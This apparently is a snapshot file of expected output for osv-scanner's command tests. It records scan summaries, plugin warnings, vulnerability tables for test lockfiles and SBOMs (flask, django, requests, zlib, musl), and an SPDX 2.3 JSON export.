[TestCommand/no_lockfiles_with_recursion_and_with_allow_flag_are_fine - 2] --- [TestCommand/no_lockfiles_with_recursion_but_without_allow_flag_are_fine - 1] Scanning dir ./testdata/locks-none Scanned /testdata/locks-none/nested/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
No issues found --- [TestCommand/no_lockfiles_with_recursion_but_without_allow_flag_are_fine - 2] --- [TestCommand/no_lockfiles_without_recursion_but_with_allow_flag_are_fine - 1] Scanning dir ./testdata/locks-none Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No package sources found No issues found --- [TestCommand/no_lockfiles_without_recursion_but_with_allow_flag_are_fine - 2] --- [TestCommand/no_lockfiles_without_recursion_or_allow_flag_give_an_error - 1] Scanning dir ./testdata/locks-none Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand/no_lockfiles_without_recursion_or_allow_flag_give_an_error - 2] No package sources found, --help for usage information. --- [TestCommand/one_file_that_does_not_match_the_supported_sbom_file_names - 1] Warning: --sbom has been deprecated in favor of -L --- [TestCommand/one_file_that_does_not_match_the_supported_sbom_file_names - 2] Failed to parse SBOM "./testdata/locks-many/composer.lock": Invalid SBOM filename. If you believe this is a valid SBOM, make sure the filename follows format per your SBOMs specification. invalid SBOM filename: ./testdata/locks-many/composer.lock --- [TestCommand/one_file_that_does_not_match_the_supported_sbom_file_names_using_-L_flag - 1] --- [TestCommand/one_file_that_does_not_match_the_supported_sbom_file_names_using_-L_flag - 2] could not determine extractor, requested spdx --- [TestCommand/one_specific_supported_lockfile - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand/one_specific_supported_lockfile - 2] --- [TestCommand/one_specific_supported_lockfile_with_ignore - 1] Scanning dir ./testdata/locks-test-ignore/package-lock.json Scanned /testdata/locks-test-ignore/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-test-ignore/osv-scanner-test.toml CVE-2021-23424 and 1 alias have been filtered out because: Test manifest file (package-lock.json) Filtered 1 vulnerability from output No issues found --- [TestCommand/one_specific_supported_lockfile_with_ignore - 2] --- [TestCommand/one_specific_supported_lockfile_with_offline_explicitly_false - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand/one_specific_supported_lockfile_with_offline_explicitly_false - 2] --- [TestCommand/one_specific_supported_sbom_with_duplicate_PURLs - 1] Warning: --sbom has been deprecated in favor of -L Scanned /testdata/sbom-insecure/with-duplicates.cdx.xml file and found 17 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. Total 2 packages affected by 5 known vulnerabilities (1 Critical, 3 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+---------------------------------------+------+-----------+---------+-----------+---------------+------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+------------------------------------------------+ | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | +---------------------------------------+------+-----------+---------+-----------+---------------+------------------------------------------------+ --- [TestCommand/one_specific_supported_sbom_with_duplicate_PURLs - 2] --- [TestCommand/one_specific_supported_sbom_with_duplicate_PURLs_using_-L_flag - 1] Scanned /testdata/sbom-insecure/with-duplicates.cdx.xml file and found 17 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. Total 2 packages affected by 5 known vulnerabilities (1 Critical, 3 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+---------------------------------------+------+-----------+---------+-----------+---------------+------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+------------------------------------------------+ | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/with-duplicates.cdx.xml | +---------------------------------------+------+-----------+---------+-----------+---------------+------------------------------------------------+ --- [TestCommand/one_specific_supported_sbom_with_duplicate_PURLs_using_-L_flag - 2] --- [TestCommand/one_specific_supported_sbom_with_invalid_PURLs - 1] Warning: --sbom has been deprecated in favor of -L Scanned /testdata/sbom-insecure/bad-purls.cdx.xml file and found 15 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 7 local/unscannable package/s from the scan. 
No issues found --- [TestCommand/one_specific_supported_sbom_with_invalid_PURLs - 2] --- [TestCommand/one_specific_supported_sbom_with_invalid_PURLs_using_-L_flag - 1] Scanned /testdata/sbom-insecure/bad-purls.cdx.xml file and found 15 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 7 local/unscannable package/s from the scan. No issues found --- [TestCommand/one_specific_supported_sbom_with_invalid_PURLs_using_-L_flag - 2] --- [TestCommand/one_specific_supported_sbom_with_vulns - 1] Warning: --sbom has been deprecated in favor of -L Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. Total 2 packages affected by 5 known vulnerabilities (1 Critical, 3 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ --- [TestCommand/one_specific_supported_sbom_with_vulns - 2] --- [TestCommand/one_specific_supported_sbom_with_vulns_using_-L_flag - 1] Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. Total 2 packages affected by 5 known vulnerabilities (1 Critical, 3 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ --- [TestCommand/one_specific_supported_sbom_with_vulns_using_-L_flag - 2] --- [TestCommand/one_specific_unsupported_lockfile - 1] Scanning dir ./testdata/locks-many/not-a-lockfile.toml Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand/one_specific_unsupported_lockfile - 2] No package sources found, --help for usage information. --- [TestCommand/only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion) - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
No issues found --- [TestCommand/only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion) - 2] --- [TestCommand/output_format:_markdown_table - 1] Scanning dir ./testdata/locks-many-with-insecure/package-lock.json Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-many-with-insecure/package-lock.json | --- [TestCommand/output_format:_markdown_table - 2] --- [TestCommand/output_format:_unsupported - 1] --- [TestCommand/output_format:_unsupported - 2] unsupported output format "unknown" - must be one of: table, html, vertical, json, markdown, sarif, gh-annotations, cyclonedx-1-4, cyclonedx-1-5, spdx-2-3 --- [TestCommand/requirements.txt_can_have_all_kinds_of_names - 1] Scanning dir ./testdata/locks-requirements Scanned /testdata/locks-requirements/my-requirements.txt file and found 1 package Scanned /testdata/locks-requirements/requirements-dev.txt file and found 1 package Scanned /testdata/locks-requirements/requirements-transitive.txt file and found 4 packages Scanned /testdata/locks-requirements/requirements.prod.txt file and found 1 package Scanned /testdata/locks-requirements/requirements.txt file and found 3 packages Scanned /testdata/locks-requirements/the_requirements_for_test.txt file and found 1 package Scanned /testdata/locks-requirements/unresolvable-requirements.txt file and found 3 packages Total 12 packages affected by 50 known vulnerabilities (5 Critical, 20 High, 20 Medium, 4 Low, 
1 Unknown) from 1 ecosystem. 50 vulnerabilities can be fixed. +-------------------------------------+------+-----------+------------+---------+---------------+-----------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+------------+---------+---------------+-----------------------------------------------------------+ | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | testdata/locks-requirements/my-requirements.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/my-requirements.txt | | https://osv.dev/GHSA-3936-cmfr-pm3m | 8.7 | PyPI | black | 25.1.0 | 26.3.1 | testdata/locks-requirements/requirements-dev.txt | | https://osv.dev/PYSEC-2021-98 | 6.9 | PyPI | django | 1.11.29 | 2.2.24 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-68w8-qjq3-2gfm | | | | | | | | https://osv.dev/GHSA-6w2r-r2m5-xq5w | 7.1 | PyPI | django | 1.11.29 | 4.2.24 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-7xr5-9hcq-chf9 | 4.0 | PyPI | django | 1.11.29 | 4.2.22 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-8x94-hmjh-97hq | 8.8 | PyPI | django | 1.11.29 | 3.2.15 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-frmv-pr5f-9mcr | 9.1 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-qw25-v68c-qjf3 | 7.5 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-rrqc-c2jx-6jgv | 6.3 | PyPI | django | 1.11.29 | 4.2.16 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | 
testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/PYSEC-2023-74 | 6.1 | PyPI | requests | 2.20.0 | 2.31.0 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-j8r2-6x86-q33q | | | | | | | | https://osv.dev/GHSA-9hjg-9r4m-mvj7 | 5.3 | PyPI | requests | 2.20.0 | 2.32.4 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/GHSA-9wx4-h78v-vm56 | 5.6 | PyPI | requests | 2.20.0 | 2.32.0 | testdata/locks-requirements/requirements-transitive.txt | | https://osv.dev/PYSEC-2021-439 | 7.3 | PyPI | django | 2.2.24 | 2.2.25 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-v6rh-hp5x-86rv | | | | | | | | https://osv.dev/PYSEC-2022-1 | 8.7 | PyPI | django | 2.2.24 | 2.2.26 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-53qw-q765-4fww | | | | | | | | https://osv.dev/PYSEC-2022-19 | 6.1 | PyPI | django | 2.2.24 | 2.2.27 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-95rw-fx8r-36v6 | | | | | | | | https://osv.dev/PYSEC-2022-190 | 9.8 | PyPI | django | 2.2.24 | 2.2.28 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-2gwj-7jmv-h26r | | | | | | | | https://osv.dev/PYSEC-2022-191 | 9.8 | PyPI | django | 2.2.24 | 2.2.28 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-w24h-v9qh-8gxj | | | | | | | | https://osv.dev/PYSEC-2022-2 | 8.7 | PyPI | django | 2.2.24 | 2.2.26 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-8c5j-9r9f-c6w8 | | | | | | | | https://osv.dev/PYSEC-2022-20 | 8.7 | PyPI | django | 2.2.24 | 2.2.27 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-6cw3-g6wv-c2xv | | | | | | | | https://osv.dev/PYSEC-2022-3 | 6.9 | 
PyPI | django | 2.2.24 | 2.2.26 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-jrh2-hc4r-7jwx | | | | | | | | https://osv.dev/GHSA-6w2r-r2m5-xq5w | 7.1 | PyPI | django | 2.2.24 | 4.2.24 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-7xr5-9hcq-chf9 | 4.0 | PyPI | django | 2.2.24 | 4.2.22 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-8x94-hmjh-97hq | 8.8 | PyPI | django | 2.2.24 | 3.2.15 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-frmv-pr5f-9mcr | 9.1 | PyPI | django | 2.2.24 | 4.2.26 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-qw25-v68c-qjf3 | 7.5 | PyPI | django | 2.2.24 | 4.2.26 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/GHSA-rrqc-c2jx-6jgv | 6.3 | PyPI | django | 2.2.24 | 4.2.16 | testdata/locks-requirements/requirements.prod.txt | | https://osv.dev/PYSEC-2021-98 | 6.9 | PyPI | django | 1.11.29 | 2.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-68w8-qjq3-2gfm | | | | | | | | https://osv.dev/GHSA-6w2r-r2m5-xq5w | 7.1 | PyPI | django | 1.11.29 | 4.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-7xr5-9hcq-chf9 | 4.0 | PyPI | django | 1.11.29 | 4.2.22 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-8x94-hmjh-97hq | 8.8 | PyPI | django | 1.11.29 | 3.2.15 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-frmv-pr5f-9mcr | 9.1 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-qw25-v68c-qjf3 | 7.5 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-rrqc-c2jx-6jgv | 6.3 | PyPI | django | 1.11.29 | 4.2.16 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | testdata/locks-requirements/requirements.txt | | 
https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-74 | 6.1 | PyPI | requests | 2.20.0 | 2.31.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-j8r2-6x86-q33q | | | | | | | | https://osv.dev/GHSA-9hjg-9r4m-mvj7 | 5.3 | PyPI | requests | 2.20.0 | 2.32.4 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-9wx4-h78v-vm56 | 5.6 | PyPI | requests | 2.20.0 | 2.32.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/PYSEC-2020-43 | 8.7 | PyPI | flask-cors | 1.0.0 | 3.0.9 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-xc3p-ff3m-f46v | | | | | | | | https://osv.dev/PYSEC-2024-71 | 8.7 | PyPI | flask-cors | 1.0.0 | 4.0.2 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-hxwh-jpp2-84pm | | | | | | | | https://osv.dev/GHSA-43qf-4rqw-9q2g | 5.3 | PyPI | flask-cors | 1.0.0 | 6.0.0 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-7rxf-gvfg-47g4 | 4.3 | PyPI | flask-cors | 1.0.0 | 6.0.0 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-84pr-m4jr-85g5 | 5.3 | PyPI | flask-cors | 1.0.0 | 4.0.1 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-8vgw-p6qm-5gr7 | 5.3 | PyPI | flask-cors | 1.0.0 | 6.0.0 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/PYSEC-2020-73 | | PyPI | pandas | 0.23.4 | 1.0.4 | testdata/locks-requirements/unresolvable-requirements.txt | 
+-------------------------------------+------+-----------+------------+---------+---------------+-----------------------------------------------------------+ --- [TestCommand/requirements.txt_can_have_all_kinds_of_names - 2] --- [TestCommand/spdx_2.3_output - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/uuid-placeholder-0", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "2025-01-01T01:01:01Z" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-uuid-placeholder-1", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "has-flag", "SPDXID": "SPDXRef-Package-has-flag-uuid-placeholder-2", "versionInfo": "4.0.0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/bunlock extractor from /testdata/locks-insecure/bun.lock", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/has-flag@4.0.0" } ] }, { "name": "wrappy", "SPDXID": "SPDXRef-Package-wrappy-uuid-placeholder-3", "versionInfo": "1.0.2", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/bunlock extractor from /testdata/locks-insecure/bun.lock", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/wrappy@1.0.2" } ] }, { "name": "league/flysystem", "SPDXID": "SPDXRef-Package-league-flysystem-uuid-placeholder-4", "versionInfo": "1.0.8", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from 
/testdata/locks-insecure/composer.lock", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/league%2Fflysystem@1.0.8" } ] }, { "name": "stdlib", "SPDXID": "SPDXRef-Package-stdlib-uuid-placeholder-5", "versionInfo": "1.99.9", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the osv/osvscannerjson extractor from /testdata/locks-insecure/osv-scanner-custom.json", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:placeholder/stdlib@1.99.9" } ] }, { "name": "toolchain", "SPDXID": "SPDXRef-Package-toolchain-uuid-placeholder-6", "versionInfo": "1.99.9", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the osv/osvscannerjson extractor from /testdata/locks-insecure/osv-scanner-custom.json", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:placeholder/toolchain@1.99.9" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-uuid-placeholder-1", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": "SPDXRef-Package-has-flag-uuid-placeholder-2", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-has-flag-uuid-placeholder-2", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": "SPDXRef-Package-wrappy-uuid-placeholder-3", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-wrappy-uuid-placeholder-3", 
"relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": "SPDXRef-Package-league-flysystem-uuid-placeholder-4", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-league-flysystem-uuid-placeholder-4", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": "SPDXRef-Package-stdlib-uuid-placeholder-5", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-stdlib-uuid-placeholder-5", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": "SPDXRef-Package-toolchain-uuid-placeholder-6", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-toolchain-uuid-placeholder-6", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestCommand/spdx_2.3_output - 2] Scanning dir ./testdata/locks-insecure Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand/verbosity_level_=_error - 1] No issues found --- [TestCommand/verbosity_level_=_error - 2] --- [TestCommand/verbosity_level_=_info - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand/verbosity_level_=_info - 2] --- [TestCommandNonGit/one_specific_supported_lockfile - 1] Scanning dir /composer.lock Scanned /composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /osv-scanner-test.toml No issues found --- [TestCommandNonGit/one_specific_supported_lockfile - 2] --- [TestCommand_CallAnalysis/Run_with_govulncheck - 1] Scanning dir ./testdata/call-analysis-go-project Scanned /testdata/call-analysis-go-project/go.mod file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Package Go/stdlib/1.19.99 has been filtered out because: Just want to test actual packages Filtered 1 ignored package/s from the scan. Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. 
+-------------------------------------+------+-----------+-----------------------------+---------+---------------+------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-----------------------------+---------+---------------+------------------------------------------+ | https://osv.dev/GO-2023-1558 | 5.9 | Go | github.com/ipfs/go-bitfield | 1.0.0 | 1.1.0 | testdata/call-analysis-go-project/go.mod | | https://osv.dev/GHSA-2h6c-j3gf-xp9r | | | | | | | +-------------------------------------+------+-----------+-----------------------------+---------+---------------+------------------------------------------+ --- [TestCommand_CallAnalysis/Run_with_govulncheck - 2] --- [TestCommand_CallAnalysis/Run_with_govulncheck_all_uncalled - 1] Scanning dir ./testdata/call-analysis-go-project-all-uncalled Scanned /testdata/call-analysis-go-project-all-uncalled/go.mod file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Package Go/stdlib/1.19.99 has been filtered out because: Just want to test actual packages Filtered 1 ignored package/s from the scan. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 